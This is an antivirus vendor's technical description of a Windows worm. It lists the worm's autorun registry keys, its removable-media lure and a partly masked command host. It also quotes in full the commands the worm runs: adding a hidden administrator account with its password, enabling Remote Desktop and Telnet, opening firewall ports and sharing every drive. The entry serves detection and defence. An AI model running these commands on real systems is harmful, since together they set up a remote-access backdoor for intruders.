JavaScript support is required for our site to be fully operational in your browser.
Win32.HLLW.Autoruner2.14608
Added to the Dr.Web virus database:
2014-05-10
Virus description added:
2014-05-22
Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'LoadOrderVerification' = '%WINDIR%\iexplorer.exe'
Creates the following services:
[<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
Creates the following files on removable media:
<Drive name for removable media>:\Cristiano Ronaldo.jpg.lnk
Malicious functions:
To bypass firewall, removes or modifies the following registry keys:
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:iexplorer'
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\iexplorer.exe' = '%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe'
Creates and executes the following:
Executes the following:
'<SYSTEM32>\netsh.exe' firewall set allowedprogram <SYSTEM32>\tlntsvr.exe iexplorer enable
'<SYSTEM32>\net1.exe' localgroup "Utilisateurs du Bureau р distance" ASPENET /add
'<SYSTEM32>\net1.exe' localgroup "Remote desktop users" ASPENET /add
'<SYSTEM32>\netsh.exe' firewall set service type = fileandprint mode = enable
'<SYSTEM32>\net1.exe' start lanmanserver
'<SYSTEM32>\sc.exe' config lanmanserver start= auto
'<SYSTEM32>\net1.exe' localgroup %USERNAME%s ASPENET /add
'<SYSTEM32>\net1.exe' share b$=b:\
'<SYSTEM32>\net1.exe' share v$=v:\
'<SYSTEM32>\net1.exe' share c$=c:\
'<SYSTEM32>\net1.exe' localgroup administrateurs ASPENET /add
'<SYSTEM32>\net1.exe' user ASPENET 159482637 /add
'<SYSTEM32>\net1.exe' share n$=n:\
'<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
'<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\Windows\CurrentVersion\Run" /v LoadOrderVerification /t REG_SZ /d "%WINDIR%\iexplorer.exe" /f
'<SYSTEM32>\net1.exe' user ASPENET /active:yes
'<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Romet Desktop"
'<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Bureau р distance"
'<SYSTEM32>\net1.exe' start TermService
'<SYSTEM32>\sc.exe' start tlntsvr
'<SYSTEM32>\sc.exe' config tlntsvr start= auto
'<SYSTEM32>\reg.exe' add "hklm\system\currentControlSet\Control\Lнsa" /v "forceguest" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\sc.exe' config TermService start= auto
'<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
'<SYSTEM32>\tlntsvr.exe'
'<SYSTEM32>\net1.exe' share y$=y:\
'<SYSTEM32>\net1.exe' share t$=t:\
'<SYSTEM32>\net1.exe' share r$=r:\
'<SYSTEM32>\net1.exe' share o$=o:\
'<SYSTEM32>\net1.exe' share i$=i:\
'<SYSTEM32>\net1.exe' share u$=u:\
'<SYSTEM32>\net1.exe' share e$=e:\
'<SYSTEM32>\netsh.exe' firewall set service type = remotedesktop mode = enable
'<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List" /v "%WINDIR%\iexplorer.exe" /t REG_SZ /d "%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe" /f
'<SYSTEM32>\cmd.exe' /c %WINDIR%\ASPENET.bat
'<SYSTEM32>\net1.exe' share z$=z:\
'<SYSTEM32>\net1.exe' share a$=a:\
'<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\windows NT\CurrentVersion\Winlogon\specialaccounts\UserList" /v ASPENET /t REG_DWORD /d 0 /f
'<SYSTEM32>\net1.exe' share l$=l:\
'<SYSTEM32>\net1.exe' share k$=k:\
'<SYSTEM32>\net1.exe' share j$=j:\
'<SYSTEM32>\net1.exe' share x$=x:\
'<SYSTEM32>\net1.exe' share w$=w:\
'<SYSTEM32>\net1.exe' share m$=m:\
'<SYSTEM32>\net1.exe' share h$=h:\
'<SYSTEM32>\net1.exe' share s$=s:\
'<SYSTEM32>\net1.exe' share q$=q:\
'<SYSTEM32>\net1.exe' share p$=p:\
'<SYSTEM32>\net1.exe' share g$=g:\
'<SYSTEM32>\net1.exe' share f$=f:\
'<SYSTEM32>\net1.exe' share d$=<Drive name for removable media>:\
Modifies file system :
Creates the following files:
%WINDIR%\ASPENET.bat
<Current directory>\SchedLgUt.Txt
%WINDIR%\iexplorer.exe
%WINDIR%\Grpvinc.cpe
Network activity:
Connects to:
'any':58008
'py####a.no-ip.biz':58008
UDP:
DNS ASK py####a.no-ip.biz
Miscellaneous:
Searches for the following windows:
ClassName: '#32770' WindowName: 'Gestionnaire des t?ches de Windows'
ClassName: '#32770' WindowName: '(null)'
ClassName: 'SysListView32' WindowName: 'processus'
ClassName: 'TApplication' WindowName: '<Virus name>'
ClassName: 'MS_WINHELP' WindowName: '(null)'
ClassName: 'TApplication' WindowName: 'iexplorer'
Download Dr.Web for Android
Free three-month trial
All protection features available
Renew your trial license in AppGallery/on Google Pay
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK